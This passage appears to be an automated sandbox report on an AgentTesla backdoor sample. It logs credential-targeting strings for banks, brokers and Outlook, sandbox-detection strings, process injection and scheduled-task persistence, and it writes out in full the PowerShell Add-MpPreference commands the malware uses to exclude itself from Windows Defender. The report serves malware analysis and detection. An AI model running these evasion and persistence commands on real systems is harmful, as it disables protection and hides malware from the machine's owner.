Source: xRAvleeiuDbJ.exe, 0000000B.00000002.2191227771.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4589529398.0000000001065000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Memory written: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Memory written: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp16A5.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process created: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process created: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

